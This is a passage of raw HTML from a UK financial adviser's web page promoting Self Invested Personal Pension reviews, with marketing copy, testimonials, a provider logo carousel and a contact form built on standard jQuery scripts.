menu-item-108\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										SIPPS										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/pensions\" title=\"Pensions\">Pensions</a></li><li>SIPPS</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"width-100\" style=\"overflow:hidden !important;padding-left:0px;padding-right:0px;\">&#13;\n		<div class=\"avada-row\" style=\"max-width:100%;\">&#13;\n				<div id=\"content\" class=\"full-width\">&#13;\n				<div id=\"post-93\" class=\"post-93 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">SIPPS</span>&#13;\n			<span class=\"updated\" style=\"display: none;\"/>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:0px;padding-bottom:20;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<h2 style=\"text-align: center;\"><span style=\"font-size: x-large;\"><span style=\"color: #99cc00;\">SIPPS</span> – Giving your more investment control, more choice and more flexibility</span></h2>&#13;\n<p style=\"text-align: center;\"><span style=\"font-size: large;\">Self Invested Personal Pensions (SIPP) are great for anyone who likes managing their own investments. We provide a</span><span style=\"font-size: large;\"> range of market leading investment options</span><span style=\"font-size: large;\"> through a range of over 4000 investment funds</span></p>&#13;\n<div class=\"demo-sep sep-double\" style=\"margin-top:20px;margin-bottom:20px\"/>&#13;\n<p style=\"text-align: center;\"><a href=\"/wp-content/uploads/2013/06/pension-transfer.jpg\"><img class=\"aligncenter\" alt=\"pension transfer\" src=\"/wp-content/uploads/2013/06/pension-transfer.jpg\" width=\"846\" height=\"274\"/></a></p>&#13;\n<div class=\"demo-sep sep-double\" style=\"margin-top:20px;margin-bottom:20px\"/><div class=\"one_half\"> <style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:#f6f6f6 !important;border-width:1px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><h2>We Make SIPPs Incredibly Easy to Manage?</h2><p/>&#13;\n<p>SIPP is short for Self Invested Personal Pensions. As the name signifies, this is a pension plan where you are the contributor and the investor.</p>&#13;\n<p>They differ from standard pension plans in a number of core areas:</p>&#13;\n<ul><li>Investment choice: You can choose to invest in over 4000 funds and a wide range of other investments such as stocks and shares and commercial property.</li>&#13;\n<li>Choices in retirement: More ways to take money from your pension.</li>&#13;\n<li>How you pay: Decide to make regular or single payments – which you can stop and start when you want.</li>&#13;\n</ul><p>Having access to an enhanced number of investment choices can be the right choice for the plan holder, however they are not for everyone as they do carry some additional risk, especially if you don’t consider yourself a skilled investor.</p>&#13;\n<p>We help simplify and streamline your investments and help you to choose, buy, sell, hold and manage your holding. As a one-stop shop, we remove unnecessary duplication and give you the benefit of low, transparent charges and market-leading initial and annual savings on funds.</p>&#13;\n<p>Call us FREE on  or click the link to the right to discuss your SIPP options</p></section></div></div><div class=\"one_half last\"><div class=\"accordian\"><h5 class=\"toggle active\"><a href=\"#\"><span class=\"arrow\"/>Here\'s how we will help you make the right SIPP choices</a></h5><div class=\"toggle-content default-open\" style=\"display: block;\">&#13;\n<ul><li>Jargon free independent advice, we have no affiliation with any business that could influence our assessment of your savings advice.</li>&#13;\n<li>Next generation SIPP comparison software and experience to find you the best deals in the market.</li>&#13;\n<li>No upfront advice charging or any hidden fees and costs.</li>&#13;\n<li>Bespoke portfolio – matched to your investment requirements and individual needs.</li>&#13;\n<li>Annual reviews – to keep your investment on track, grow and meet your savings goals.</li>&#13;\n<li>We don’t rush – You’ll feel safe in the knowledge that your savings needs are all being expertly handled by real people who care</li>&#13;\n</ul><p/></div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>2o Years Established - That Counts</a></h5><div class=\"toggle-content \" style=\"\">This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our conversation.</div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Promise</a></h5><div class=\"toggle-content \" style=\"\">We stand for honesty – advice – trust and value. Our culture and people matter and promise you this, the team that makes Equity SMART work will be centred on you. Our team believe in treating clients like family, so you can be confident that we’ll give you the same advice we would give to our own relatives.</div><h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Investment Philosophy -Get Rich Slowly</a></h5><div class=\"toggle-content \" style=\"\">We believe in a “Get Rich Slowly” philosophy through a “passive investment” approach to purchasing investments. This we believe is the right choice for the majority of investors who are seeking more peace of mind, when looking to achieve sustained performance over the longer term.&#13;\n<ul><li>Passive investment is the rational, mathematically proven route to investing success.</li>&#13;\n<li>Our investment strategies are focused on your risk profile, well researched, efficient and low maintenance.</li>&#13;\n<li>We look to keep your costs low through longer term appreciation, reduced maintenance and look to avoid unnecessary trading.</li>&#13;\n<li>Ensure you are not over exposed at any time through wide diversification of your asset classes.</li>&#13;\n<li>We provide regular reviews and rebalancing when required or on a 6 monthly or yearly basis.</li>&#13;\n</ul><p/></div></div> <div class=\"demo-sep sep-none\" style=\"margin-top:18px;\"/><a class=\"button large e.g. green\" href=\"#standard\" target=\"\">Click Here For Your Free SIPP Review</a></div><div class=\"clearboth\"/> </div></div> <div class=\"fullwidth-box\" style=\"background-color:#fafafa;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid #fafafa;border-bottom:0px solid #fafafa;padding-top:5px;padding-bottom:1px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"> <div class=\"title\"><h1>Get Your SIPP Review in 4 Easy Steps</h1><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div><div class=\"demo-sep sep-none\" style=\"margin-top:45px;\"/><style type=\"text/css\"><![CDATA[\r\n		#content-boxes-1 article.col{background-color:#ffffff !important;}\r\n		#content-boxes-1 .fontawesome-icon.circle-yes{color:#ffffff !important;background-color:#afd9a5 !important;border:1px solid #afd9a5 !important;}\r\n		]]></style><section class=\"clearfix columns content-boxes content-boxes-icon-boxed columns-4\" id=\"content-boxes-1\"><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Contact us today</h2></div><div class=\"col-content-container \">Get in touch to find out how we can be of service. It’s confidential and we provide you with the highest level of consumer protection when it comes to SIPP advice.</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Prepare A Review</h2></div><div class=\"col-content-container \">We’ll get to know you, your specific needs and your financial circumstances to allow us to analyse and report back, allowing you to make better and more informed decisions.</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Explain Options</h2></div><div class=\"col-content-container \">We’ll explain all the SIPP options available to you, discuss both the pros &amp; the cons and then make a written recommendation on your best options.</div></article><article class=\"col last\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-ok\"/><h2>If You Proceed</h2></div><div class=\"col-content-container \">All the paperwork is arranged for you and processed quickly &amp; efficiently. Throughout this process we’ll always be in touch, keeping you in the loop and up to date.</div></article></section><style type=\"text/css\"><![CDATA[#reading-box-container-2 .tagline-shadow:before,#reading-box-container-2 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-2\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#ffffff !important;border-width:1px;border-color:#f6f6f6!important;border-top-width:3px !important;border-top-color:#afd9a5!important;border-style:solid;\"><a href=\"#standard\" target=\"\" class=\"continue button large default\">Start Your SIPP Review</a><h2>Start Your SIPP Review Today</h2><p>Click the button and fill out our short form and one of our advisers will contact you.</p><a href=\"#standard\" target=\"\" class=\"continue mobile-button button large default\">Start Your SIPP Review</a></section></div><a id=\"iphorm_fancybox_52fde6e488ccb\" class=\"iphorm-fancybox-link iphorm-fancybox-link-1\" href=\"#\"/>&#13;\n<script type=\"text/javascript\"><![CDATA[\r\n<!--\r\n    jQuery(document).ready(function ($) {\r\n        var $link = $(\'#iphorm_fancybox_52fde6e488ccb\');\r\n        if ($.isFunction($.fn.fancybox) && !$link.data(\'iphorm-initialised\')) {\r\n            $link.fancybox($.extend({\r\n                inline: true,\r\n                href: \'#iphorm-outer-52fde6e485d24\',\r\n                onStart: function () {\r\n                    $(\'#fancybox-outer\').css(\'opacity\', 0);\r\n                },\r\n                onComplete: function () {\r\n                    $(\'#fancybox-wrap, #fancybox-content\').css({width: \'auto\'});\r\n                    $.fancybox.center(0);\r\n                    setTimeout(function () {\r\n                        $(\'#fancybox-outer\').animate({opacity: 1}, 400);\r\n                        $(\'#fancybox-overlay\').css({height: $(document).height()});\r\n                    }, 1);\r\n                }\r\n            }, {})).data(\'iphorm-initialised\', true);\r\n        }\r\n    });\r\n//-->\r\n]]></script><div style=\"display: none;\">&#13;\n<div id=\"iphorm-outer-52fde6e485d24\" class=\"iphorm-outer iphorm-outer-1 iphorm-uniform-theme-default iphorm-theme-light-rounded\">&#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n		    jQuery(document).ready(function($) {\r\n			\r\n        	$(\'#iphorm-52fde6e485d24\').iPhorm({\"id\":1,\"uniqueId\":\"52fde6e485d24\",\"PHPSESSID\":\"5518e6d1a537bfe4b994afd1ab0f4853\",\"useAjax\":true,\"successMessageTimeout\":10,\"clElementIds\":[],\"clDependentElementIds\":[],\"centerFancybox\":true,\"centerFancyboxSpeed\":true});\r\n\r\n	        	        if ($.isFunction($.fn.qtip)) {\r\n	            $(\'.iphorm-tooltip-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'focus\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-hover\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-tooltip-icon-click\', iPhorm.instance.$form).qtip({\r\n	                style: {\r\n	                    classes: \'qtip-plain qtip-shadow\'\r\n	                },\r\n	                position: {\r\n	                    my: \'left center\',\r\n	                    at: \'right center\'\r\n	                },\r\n	                show: {\r\n	                    event: \'click\'\r\n	                },\r\n	                hide: {\r\n	                    event: \'unfocus\'\r\n	                },\r\n	                content: {\r\n	                    text: function (api) {\r\n	                        return $(this).find(\'.iphorm-tooltip-icon-content\')();\r\n	                    }\r\n	                }\r\n	            });\r\n	            $(\'.iphorm-labels-inside > .iphorm-element-spacer > label\').hover(function () {\r\n	                $(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'show\');\r\n	            }, function () {\r\n	            	$(this).siblings(\'.iphorm-input-wrap\').find(\'.iphorm-tooltip-hover\').qtip(\'hide\');\r\n	            });\r\n	        }\r\n	        \r\n	        	        if ($.isFunction($.fn.uniform)) {\r\n	            $(\'select, input:checkbox, input:radio\', iPhorm.instance.$form).uniform({context: iPhorm.instance.$form, selectAutoWidth: false});\r\n	        }\r\n	        \r\n	        if ($.isFunction($.fn.inFieldLabels)) {\r\n	            $(\'.iphorm-labels-inside:not(.iphorm-element-wrap-recaptcha) > .iphorm-element-spacer > label\', iPhorm.instance.$form).inFieldLabels();\r\n	        }\r\n\r\n	        \r\n	        $(\'.iphorm-group-row > div:last-child:not(:first-child)\', iPhorm.instance.$form).add(\'.iphorm-group-row:last-child\', iPhorm.instance.$form).addClass(\'last-child\');\r\n\r\n	        	    }); // end document.ready()\r\n	//-->\r\n	]]></script><form id=\"iphorm-52fde6e485d24\" class=\"iphorm iphorm-form-1\" action=\"../../pensions/sipps/\" method=\"post\" enctype=\"multipart/form-data\">&#13;\n        <div class=\"iphorm-inner iphorm-inner-1\">&#13;\n            <input type=\"hidden\" name=\"iphorm_id\" value=\"1\"/><input type=\"hidden\" name=\"iphorm_uid\" value=\"52fde6e485d24\"/><input type=\"hidden\" name=\"form_url\" value=\"http://www.equalitywalk.org.uk/pensions/sipps/\"/><input type=\"hidden\" name=\"referring_url\" value=\"\"/><input type=\"hidden\" name=\"post_id\" value=\"93\"/><input type=\"hidden\" name=\"post_title\" value=\"SIPPS\"/><h3 class=\"iphorm-title\">Contact Equity SMART&#13;\n                                        </h3><p class=\"iphorm-description\"><big>For expert impartial advice and a FREE consultation with no obligation fill out the short form below.<br/><br/>&#13;\n&#13;\nor<br/><br/><b>Call Us FREE on <span class=\"rTapNumber13629\"/></b>&#13;\n</big></p>&#13;\n                                    	            		<div class=\"iphorm-success-message iphorm-hidden\"/>&#13;\n            	                        <div class=\"iphorm-elements iphorm-elements-1 iphorm-clearfix\">&#13;\n                <div class=\"iphorm-group-wrap iphorm_1_6-group-wrap iphorm-clearfix iphorm-labels-above iphorm-group-style-plain iphorm-group-alignment-proportional\">&#13;\n    <div class=\"iphorm-group-elements\">&#13;\n                <div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-1cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_1-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_1-element-spacer\">&#13;\n                    <label for=\"iphorm_1_1_52fde6e485d24\">&#13;\n                Name                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_1-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_1\" id=\"iphorm_1_1_52fde6e485d24\" type=\"text\" name=\"iphorm_1_1\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div>        </div> <!-- /.iphorm-group-row -->&#13;\n    </div> <!-- /.iphorm-group-elements -->&#13;\n</div> <!-- /.iphorm-group-wrap --><div class=\"iphorm-group-wrap iphorm_1_8-group-wrap iphorm-clearfix iphorm-labels-above iphorm-group-style-plain iphorm-group-alignment-proportional\">&#13;\n    <div class=\"iphorm-group-elements\">&#13;\n                <div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-2cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_5-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_5-element-spacer\">&#13;\n                    <label for=\"iphorm_1_5_52fde6e485d24\">&#13;\n                Contact Number                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_5-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_5\" id=\"iphorm_1_5_52fde6e485d24\" type=\"text\" name=\"iphorm_1_5\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div><div class=\"iphorm-element-wrap iphorm-element-wrap-text iphorm_1_2-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-text iphorm_1_2-element-spacer\">&#13;\n                    <label for=\"iphorm_1_2_52fde6e485d24\">&#13;\n                Email address                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-text iphorm_1_2-input-wrap\">&#13;\n            <input class=\"iphorm-element-text  iphorm_1_2\" id=\"iphorm_1_2_52fde6e485d24\" type=\"text\" name=\"iphorm_1_2\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div></div><div class=\"iphorm-group-row iphorm-clearfix iphorm-group-row-2cols\"><div class=\"iphorm-element-wrap iphorm-element-wrap-checkbox iphorm_1_11-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-checkbox iphorm_1_11-element-spacer\">&#13;\n                    <label class=\"iphorm_1_11-outer-label\">&#13;\n                What Would You Like To Discuss?                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-checkbox iphorm_1_11-input-wrap\">&#13;\n            <div class=\"iphorm-input-ul iphorm-input-checkbox-ul iphorm_1_11-input-ul iphorm-options-block iphorm-clearfix\">&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_1_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_1\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fde6e485d24_1\" value=\"Pensions\"/>&#13;\n                        Pensions                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_2_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_2\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fde6e485d24_2\" value=\"Insurance\"/>&#13;\n                        Insurance                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_3_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_3\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fde6e485d24_3\" value=\"Trusts\"/>&#13;\n                        Trusts                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_4_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_4\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fde6e485d24_4\" value=\"Investments\"/>&#13;\n                        Investments                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_5_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_5\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fde6e485d24_5\" value=\"Wealth\"/>&#13;\n                        Wealth                    </label>&#13;\n                </div>&#13;\n                            <div class=\"iphorm-input-li iphorm-input-checkbox-li iphorm_1_11-input-li\">&#13;\n                    <label class=\"iphorm_1_11_6_label\">&#13;\n                        <input class=\"iphorm-element-checkbox iphorm_1_11 iphorm_1_11_6\" type=\"checkbox\" name=\"iphorm_1_11[]\" id=\"iphorm_1_11_52fde6e485d24_6\" value=\"Other\"/>&#13;\n                        Other                    </label>&#13;\n                </div>&#13;\n                        </div>&#13;\n                    </div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-element-wrap iphorm-element-wrap-textarea iphorm_1_10-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-optional\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-textarea iphorm_1_10-element-spacer\">&#13;\n                    <label for=\"iphorm_1_10_52fde6e485d24\">&#13;\n                Comments                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-textarea iphorm_1_10-input-wrap\">&#13;\n            <textarea class=\"iphorm-element-textarea  iphorm_1_10\" id=\"iphorm_1_10_52fde6e485d24\" name=\"iphorm_1_10\" rows=\"5\" cols=\"25\"/></div>&#13;\n        <div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n    </div>        </div> <!-- /.iphorm-group-row -->&#13;\n    </div> <!-- /.iphorm-group-elements -->&#13;\n</div> <!-- /.iphorm-group-wrap --><div class=\"iphorm-element-wrap iphorm-element-wrap-captcha iphorm_1_4-element-wrap iphorm-clearfix iphorm-labels-above iphorm-element-required\">&#13;\n    <div class=\"iphorm-element-spacer iphorm-element-spacer-captcha iphorm_1_4-element-spacer\">&#13;\n                    <label for=\"iphorm_1_4_52fde6e485d24\">&#13;\n                Type the characters                                    <span class=\"iphorm-required\">(required)</span>&#13;\n                                            </label>&#13;\n                <div class=\"iphorm-input-wrap iphorm-input-wrap-captcha iphorm_1_4-input-wrap\">&#13;\n            <input class=\"iphorm-element-captcha  iphorm_1_4\" id=\"iphorm_1_4_52fde6e485d24\" type=\"text\" name=\"iphorm_1_4\" value=\"\" style=\"width: 200px;\"/></div>&#13;\n        <div class=\"iphorm-captcha-image-wrap iphorm-clearfix iphorm_1_4-captcha-image-wrap\">&#13;\n            <div class=\"ifb-captcha-image-inner\">&#13;\n                &#13;\n            </div>&#13;\n        </div>&#13;\n&#13;\n        <script type=\"text/javascript\"><![CDATA[\r\n        <!--\r\n        jQuery(document).ready(function ($) {\r\n            $(\'#iphorm-captcha-image-iphorm_1_4_52fde6e485d24\').hover(function () {\r\n                $(this).stop().fadeTo(\'slow\', \'0.3\');\r\n            }, function () {\r\n                $(this).stop().fadeTo(\'slow\', \'1.0\');\r\n            }).click(function () {\r\n                var newSrc = $(this).attr(\'src\').replace(/&t=.+/, \'&t=\' + new Date().getTime());\r\n                $(this).attr(\'src\', newSrc);\r\n            });\r\n        });\r\n        //-->\r\n        ]]></script><div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-hidden\">&#13;\n    <label>This field should be left blank<input type=\"text\" name=\"iphorm_1_0\"/></label>&#13;\n</div>                <div class=\"iphorm-submit-wrap iphorm-submit-wrap-1 iphorm-clearfix\">&#13;\n                	<div class=\"iphorm-submit-input-wrap iphorm-submit-input-wrap-1\">&#13;\n                        <button class=\"iphorm-submit-element\" type=\"submit\" name=\"iphorm_submit\"><span><em>Send Enquiry</em></span></button>&#13;\n                    </div>&#13;\n                    <div class=\"iphorm-loading-wrap\"><span class=\"iphorm-loading\">Please wait...</span></div>&#13;\n                </div>&#13;\n            </div>&#13;\n                                            </div>&#13;\n            &#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n	jQuery(\'#iphorm-outer-52fde6e485d24 script\').remove();\r\n	//-->\r\n	]]></script></form></div></div>&#13;\n        <script type=\"text/javascript\"><![CDATA[// <![CDATA[\r\njQuery(document).ready(function ($) {     $(\'a[href=\"#standard\"]\').click(function () {         $(\'.iphorm-fancybox-link\').click();         return false;     }); });\r\n// ]]&gt;]]></script></div></div> <div class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:15px;padding-bottom:0;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"> <div class=\"title\"><h2>Kind Words &amp; Praise</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <div class=\"one_half\"> <style type=\"text/css\"><![CDATA[\r\n		#testimonials-1 q{background-color:#f6f6f6 !important;color:#747474 !important;}\r\n		#testimonials-1 .review blockquote div:after{border-top-color:#f6f6f6 !important;}\r\n		]]></style><div id=\"testimonials-1\" class=\"reviews clearfix\"/> <div class=\"review male\"><blockquote><q>“Very pleased with the service provided. Highly professional and standard of information provided was very comprehensive. I was kept informed at all stages of the process.”</q><div class=\"clearfix\"><span class=\"company-name\">Stephen McCoy</span></div></blockquote></div></div> <div class=\"one_half last\"><style type=\"text/css\"><![CDATA[\r\n		#testimonials-2 q{background-color:#f6f6f6 !important;color:#747474 !important;}\r\n		#testimonials-2 .review blockquote div:after{border-top-color:#f6f6f6 !important;}\r\n		]]></style><div id=\"testimonials-2\" class=\"reviews clearfix\"> <div class=\"review male\"><blockquote><q>“I found the staff who I personally dealt with very friendly helpful and professional and the people on the other side of the phone exceptionally friendly too.”</q><div class=\"clearfix\"><span class=\"company-name\">M Patterson</span></div></blockquote></div> </div> </div><div class=\"clearboth\"/>&#13;\n<p>We Compare All The Leading SIPP Providers. Here are a Few You Might Recognise:</p>&#13;\n<div class=\"images-carousel-container related-posts related-projects \"><div id=\"carousel\" class=\"clients-carousel es-carousel-wrapper\"><div class=\"es-carousel\"><ul><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/axa.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/aegon.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/aviva.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/friendslife.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/Standard_Life_logo1.png\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/legal-and-general.gif\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/prudential.jpg\" alt=\"\"/></a></li></ul><div class=\"es-nav\"><span class=\"es-nav-prev\">Previous</span><span class=\"es-nav-next\">Next</span></div></div></div></div></div></div> <div class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"><style type=\"text/css\"><![CDATA[#reading-box-container-3 .tagline-shadow:before,#reading-box-container-3 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" 